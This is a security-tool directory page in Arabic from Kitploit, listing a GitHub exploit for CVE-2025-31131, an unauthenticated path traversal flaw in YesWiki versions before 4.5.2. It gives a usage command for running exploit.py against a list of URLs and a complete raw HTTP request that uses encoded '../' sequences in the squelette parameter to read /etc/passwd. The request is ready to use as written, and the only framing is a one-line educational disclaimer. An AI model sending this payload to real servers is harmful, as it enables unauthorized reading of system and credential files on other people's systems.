Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-31131 — YesWiki هو نظام ويكي مكتوب بلغة PHP. المعامل squelette عرضة لهجمات تجاوز المسار، مما يتيح القراءة من أي ملفات على الخادم. | Kitploit
أدوات/GitHubGitHub/muhammadwaseem29/cve-2025-31131
تحليل الثغرات الأمنيةالاستغلالجمع المعلوماتأمن الويباختبار الاختراقالتعلم والتعليم
GitHubmuhammadwaseem29/cve-2025-31131

CVE-2025-31131

YesWiki هو نظام ويكي مكتوب بلغة PHP. المعامل squelette عرضة لهجمات تجاوز المسار، مما يتيح القراءة من أي ملفات على الخادم.

عرض المستودع
14منذ سنة واحدةلم تتم المراجعة بعد
الموقع الإلكتروني

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-31131 - ثغرة تجاوز المسار في YesWiki < 4.5.2

هذا استغلال غير مصادق عليه لثغرة تجاوز المسار يستهدف إصدارات YesWiki الأقدم من 4.5.2. توجد الثغرة في المعلمة squelette، والتي تسمح بقراءة ملفات عشوائية من الخادم.

تفاصيل الثغرة

  • CVE-ID: CVE-2025-31131
  • البرنامج المتأثر: YesWiki < 4.5.2
  • النوع: تجاوز المسار
  • الخطورة: عالية (CVSS: 8.6)
  • المرجع: https://github.com/advisories/GHSA-w34w-fvp3-68xm

الاستخدام

python3 exploit.py -l urls.txt image

إليك طريقة ثانية للاستغلال يدويًا باستخدام Burp:

GET /?UrkCEO/edit&theme=margot&squelette=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&style=margot.css HTTP/1.1
Host: target.com
Sec-Ch-Ua: "Chromium";v="133", "Not(A:Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Priority: u=0, i
Connection: keep-alive

image

إخلاء مسؤولية: هذا مخصص لأغراض تعليمية فقط.

تنزيل الأداة